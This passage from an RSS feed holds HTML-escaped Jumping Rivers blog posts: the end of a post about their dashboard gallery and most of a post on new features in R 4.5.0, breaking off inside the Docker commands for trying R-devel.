applications to be &lt;em&gt;responsive&lt;/em&gt; to a user&amp;rsquo;s browser size or device. They may need a user interface
that matches their &lt;em&gt;branding&lt;/em&gt;, or that is easy to use. Data itself is sometimes a challenge, and
some clients need a
&lt;a href="https://www.jumpingrivers.com/tags/who/" rel="external"&gt;&lt;em&gt;data pipeline&lt;/em&gt;&lt;/a&gt; developing, for pre-processing or
validation, so that their applications can work more effectively. There are niche skills involved in
&lt;em&gt;data presentation and visualisation&lt;/em&gt;, and we have a wealth of experience with charts, tables and maps,
and have built a range of &lt;em&gt;custom data-widgets&lt;/em&gt; for clients.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-shiny-dashboard-app-gallery"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Our &lt;a href="https://jumpingrivers.com/data-science/gallery/" rel="external"&gt;dashboard gallery&lt;/a&gt; contains several
applications that highlight our expertise across the &lt;em&gt;Jumping Rivers&lt;/em&gt; data science team. Within it,
you can find a list of the applications that are available to view, with links to each and some
technical information. All the applications are publicly accessible. In the coming months we will be
adding further applications to the gallery.&lt;/p&gt;
&lt;p&gt;At &lt;em&gt;Jumping Rivers&lt;/em&gt; we have worked with
&lt;a href="https://shiny.posit.co/" rel="external"&gt;Shiny&lt;/a&gt; for many years (including Shiny for Python), and have several
&lt;a href="https://www.jumpingrivers.com/training/all-courses/?search=shiny"&gt;training courses&lt;/a&gt; and dozens of
&lt;a href="https://www.jumpingrivers.com/blog/?search=shiny"&gt;blog posts&lt;/a&gt;, and host our annual conference
&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;&amp;ldquo;Shiny in Production&amp;rdquo;&lt;/a&gt; on this tool. Consequently,
many of the gallery applications are built using Shiny. But our team also boasts expertise with the
data visualisation library
&lt;a href="https://d3js.org/" rel="external"&gt;D3.js&lt;/a&gt; and a range of JavaScript frameworks, and so there is a
&lt;a href="https://vuejs.org/" rel="external"&gt;Vue.js&lt;/a&gt; application and a timeline developed in D3 presented within the
showcase too.&lt;/p&gt;
&lt;p&gt;Included in our initial gallery collection are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;our &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;Litmus dashboard&lt;/a&gt; which displays risk- and
quality-scores for use when validating R packages (see our recent
&lt;a href="https://www.jumpingrivers.com/blog/litmus-dashboard/" rel="external"&gt;blog post&lt;/a&gt;);&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/litmus.png" alt="A dashboard showing quality statistics about R packages"
style="display: block; margin: auto"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a &lt;a href="https://gallery-icbmap.jmpr.io" rel="external"&gt;map application&lt;/a&gt; displaying the
&amp;ldquo;Integrated Care Board&amp;rdquo; boundaries and population sizes for NHS England;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/icb.png" alt="A map showing the 'Integrated Care Board' boundaries for NHS
England" style="display: block; margin: auto"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a &lt;a href="https://jumpingrivers.com/misc/timeline/" rel="external"&gt;timeline&lt;/a&gt; showing the history of the R language,
built with D3.js;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/r-timeline.png" alt="Part of a timeline about the history of the R language"
style="display: block; margin: auto"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a fun &lt;a href="https://gallery-cats.jmpr.io" rel="external"&gt;quiz&lt;/a&gt; to determine which cat
you are;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/cats.png" alt="The front page of a quiz that determines what type of cat you
are" style="display: block; margin: auto"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;an &lt;a href="https://jumpingrivers.com/misc/jfk-departures" rel="external"&gt;airport departure-board&lt;/a&gt; with
interactively-selectable columns.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/departures.png" alt="A dashboard displaying departure times in the style of
an airport departure screen" style="display: block; margin: auto"&gt;&lt;/p&gt;
&lt;p&gt;Please explore our &lt;a href="https://jumpingrivers.com/data-science/gallery/" rel="external"&gt;dashboard gallery&lt;/a&gt;, and if you
or your team have a project that would
benefit from our expertise in dashboard development, deployment and the underlying infrastructure,
please &lt;a href="https://jumpingrivers.com/contact/" rel="external"&gt;contact us&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What's new in R 4.5.0?</title><link>https://www.jumpingrivers.com/blog/whats-new-r45/</link><pubDate>Thu, 10 Apr 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/whats-new-r45/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r45/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/whats-new-r45/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;R 4.5.0 (“How About a Twenty-Six”) was released on 11th April, 2025.
Here we summarise some of the interesting changes that have been
introduced. In previous blog posts we have discussed the new features
introduced in &lt;a href="https://www.jumpingrivers.com/blog/whats-new-r44/" rel="external"&gt;R
4.4.0&lt;/a&gt; and earlier
versions (see the links at the end of this post).&lt;/p&gt;
&lt;p&gt;The full changelog can be found at the &lt;a href="https://cran.r-project.org/doc/manuals/r-release/NEWS.html" rel="external"&gt;r-release ‘NEWS’
page&lt;/a&gt; and if
you want to keep up to date with developments in base R, have a look at
the &lt;a href="https://cran.r-project.org/doc/manuals/r-devel/NEWS.html" rel="external"&gt;r-devel ‘NEWS’
page&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-whats-new-r45"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="penguins"&gt;penguins&lt;/h2&gt;
&lt;p&gt;Who doesn’t love a new dataset?&lt;/p&gt;
&lt;p&gt;One of the great things about learning R for data science is that there
is a collection of datasets available to work with, built into the base
installation of R. The Palmer Penguins dataset has been available via an
&lt;a href="https://cran.r-project.org/web/packages/palmerpenguins/readme/README.html" rel="external"&gt;external
package&lt;/a&gt;
since 2020, and has been added to R v4.5.0 as a base dataset.&lt;/p&gt;
&lt;p&gt;This dataset is useful for clustering and classification tasks and was
originally highlighted as an alternative to the &lt;code&gt;iris&lt;/code&gt; dataset.&lt;/p&gt;
&lt;p&gt;In addition to the &lt;code&gt;penguins&lt;/code&gt; dataset, there is a related &lt;code&gt;penguins_raw&lt;/code&gt;
dataset. This may prove useful when teaching or learning data cleaning.&lt;/p&gt;
&lt;h2 id="use"&gt;&lt;code&gt;use()&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;If you have worked in languages other than R, its approach to importing
code from packages may seem strange. In a Python module, you would
either import a package and then use functions from within the explicit
namespace for the package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;numpy&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;array([&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# array([1, 2, 3])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Or you would import a specific function by name, prior to its use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; array
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;array([&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# array([1, 2, 3])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In an R script, we either use explicitly-namespaced functions (without
loading the containing package):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(bill_len &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;40&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Or we attach a package, adding all its exported functions to the
search path, and then use the specific functions we need:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(bill_len &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;40&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The latter form can cause some confusion. If you attach multiple packages,
there may be naming conflicts between their exported functions. Indeed,
there is a &lt;code&gt;filter()&lt;/code&gt; function in the base package &lt;code&gt;{stats}&lt;/code&gt; that is
masked when we attach &lt;code&gt;{dplyr}&lt;/code&gt;, so the behaviour of a bare &lt;code&gt;filter()&lt;/code&gt;
call differs before and after loading &lt;code&gt;{dplyr}&lt;/code&gt;.&lt;/p&gt;
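&lt;p&gt;A quick way to see this conflict for yourself is sketched below. It assumes a
fresh R session with &lt;code&gt;{dplyr}&lt;/code&gt; installed, and simply compares whatever the bare
name &lt;code&gt;filter&lt;/code&gt; resolves to against the explicitly-namespaced functions:&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r"&gt;# Fresh session: the bare name filter resolves to stats::filter
identical(filter, stats::filter)
# [1] TRUE

# Attaching {dplyr} places its filter() ahead of {stats} on the search path
library(&amp;quot;dplyr&amp;quot;)
identical(filter, stats::filter)
# [1] FALSE
identical(filter, dplyr::filter)
# [1] TRUE
&lt;/code&gt;&lt;/pre&gt;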
&lt;p&gt;The release notes for R 4.5.0 announce a new way to load objects from a
package: &lt;code&gt;use()&lt;/code&gt; (the function itself has actually been available since
R 4.4.0). This allows us to be more precise about which functions we load, and
from where:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.5.0 (New session)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;filter&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;select&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Attaching package: ‘dplyr’&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# The following object is masked from ‘package:stats’:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# filter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(bill_len &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;40&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(species&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;bill_dep)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# species island bill_len bill_dep&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 1 Adelie Torgersen 40.3 18.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 2 Adelie Torgersen 42.0 20.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 3 Adelie Torgersen 41.1 17.6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 4 Adelie Torgersen 42.5 20.7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 5 Adelie Torgersen 46.0 21.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 6 Adelie Biscoe 40.6 18.6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that only those objects that we &lt;code&gt;use()&lt;/code&gt; get imported from the
package:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# R 4.5.0 (Session continued)
n_distinct(penguins)
# Error in n_distinct(penguins) : could not find function &amp;quot;n_distinct&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A feature similar to &lt;code&gt;use()&lt;/code&gt; has been available in the
&lt;a href="https://klmr.me/box/reference/use.html" rel="external"&gt;&lt;code&gt;{box}&lt;/code&gt;&lt;/a&gt; and
&lt;a href="https://cran.r-project.org/web/packages/import/vignettes/import.html" rel="external"&gt;&lt;code&gt;{import}&lt;/code&gt;&lt;/a&gt;
packages for a while. &lt;code&gt;{box}&lt;/code&gt; is a particularly interesting project, as it
allows more fine-grained control over the import and export of objects
from specific code files.&lt;/p&gt;
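&lt;p&gt;For comparison, selective imports in those two packages look roughly like
this. This is only a sketch, assuming both packages (and &lt;code&gt;{dplyr}&lt;/code&gt;) are
installed; their documentation covers the full syntax:&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r"&gt;# {import}: make only filter() and select() from {dplyr} available
import::from(dplyr, filter, select)

# {box}: the same idea, using the bracket syntax of box::use()
box::use(dplyr[filter, select])
&lt;/code&gt;&lt;/pre&gt;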
&lt;h2 id="parallel-downloads"&gt;Parallel downloads&lt;/h2&gt;
&lt;p&gt;Historically, the &lt;code&gt;install.packages()&lt;/code&gt; function worked sequentially:
packages were downloaded and installed one at a time. This meant that
installing many packages could be slow.&lt;/p&gt;
&lt;p&gt;We often recommend the
&lt;a href="https://pak.r-lib.org/reference/features.html" rel="external"&gt;&lt;code&gt;{pak}&lt;/code&gt;&lt;/a&gt; package for
installing packages because it can download and install packages in
parallel.&lt;/p&gt;
&lt;p&gt;But as of R 4.5.0, &lt;code&gt;install.packages()&lt;/code&gt; (and the related
&lt;code&gt;download.packages()&lt;/code&gt; and &lt;code&gt;update.packages()&lt;/code&gt;) are capable of
downloading packages in parallel. This may speed up the whole
download-and-install process. As described in a post on the &lt;a href="https://blog.r-project.org/2024/12/02/faster-downloads/" rel="external"&gt;R-project
blog&lt;/a&gt; by Tomas
Kalibera, the typical speed-up expected is around 2-5x (although this is
highly variable).&lt;/p&gt;
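&lt;p&gt;As a minimal sketch of how you might take advantage of this (the package
names are placeholders, and we are assuming that no special arguments are
needed), requesting several packages in a single call gives R the opportunity
to fetch them simultaneously:&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r"&gt;# Placeholder package names; any set of several packages will do
pkgs &lt;- c(&amp;quot;dplyr&amp;quot;, &amp;quot;ggplot2&amp;quot;, &amp;quot;tidyr&amp;quot;)

# One call for all packages, so the downloads can proceed together
install.packages(pkgs)

# Alternatively: Ncpus is a separate, long-standing argument that
# parallelises the installation of source packages, not the downloads
install.packages(pkgs, Ncpus = 2L)
&lt;/code&gt;&lt;/pre&gt;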
&lt;h2 id="c23"&gt;C23&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://en.cppreference.com/w/c/23" rel="external"&gt;C23&lt;/a&gt; is the current standard for
the C language. Much of base R and many R packages require compilation
from C. If a C23 compiler is available on your machine, R will now
preferentially use that.&lt;/p&gt;
&lt;h2 id="grepv"&gt;grepv()&lt;/h2&gt;
&lt;p&gt;For pattern matching in base R, &lt;code&gt;grep()&lt;/code&gt; and related functions are the
main tools. By default, &lt;code&gt;grep()&lt;/code&gt; returns the index of any entry in a
vector that matches some pattern.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins_raw&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Comments &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grep&lt;/span&gt;(pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Nest&amp;#34;&lt;/span&gt;, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] 7 8 29 30 39 40 69 70 121 122 131 132 139 140 163 164 193 194 199&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [20] 200 271 272 277 278 293 294 299 300 301 302 303 304 315 316 341 342&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It has long been possible to extract the values of the input vector, rather than
the indices, by specifying &lt;code&gt;value = TRUE&lt;/code&gt; in the arguments to &lt;code&gt;grep()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins_raw&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Comments &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grep&lt;/span&gt;(pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Nest&amp;#34;&lt;/span&gt;, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _, value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [2] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [3] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [4] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [5] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [6] &amp;#34;Nest never observed with full clutch. Not enough blood for isotopes.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, in R 4.5.0, a new function &lt;code&gt;grepv()&lt;/code&gt; has been introduced which will
automatically extract values rather than indices from pattern matching:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins_raw&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Comments &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepv&lt;/span&gt;(pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Nest&amp;#34;&lt;/span&gt;, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [2] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [3] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [4] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [5] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [6] &amp;#34;Nest never observed with full clutch. Not enough blood for isotopes.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2 id="contributions-from-r-dev-days"&gt;Contributions from R-Dev-Days&lt;/h2&gt;
&lt;p&gt;Many of the changes described in the “R News” for the new
release came about as contributions from R Dev Days. These are regular
events that aim to expand the number of people contributing code to the
core of R. In 2024, Jumping Rivers staff attended these events in London
and &lt;a href="https://jumpingrivers.com/blog/r-dev-day-2024/" rel="external"&gt;Newcastle&lt;/a&gt; (prior
to “SatRDays” and &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;“Shiny In
Production”&lt;/a&gt;,
respectively). Dev days are often attached to a conference and provide
an interesting challenge to anyone interested in keeping R healthy and
learning some new skills.&lt;/p&gt;
&lt;h2 id="trying-out-r-450"&gt;Trying out R 4.5.0&lt;/h2&gt;
&lt;p&gt;To take away the pain of installing the latest development version of R,
you can use Docker. The following commands pull and run the
&lt;code&gt;devel&lt;/code&gt; version of R:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rstudio/r-base:devel-jammy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -it rstudio/r-base:devel-jammy
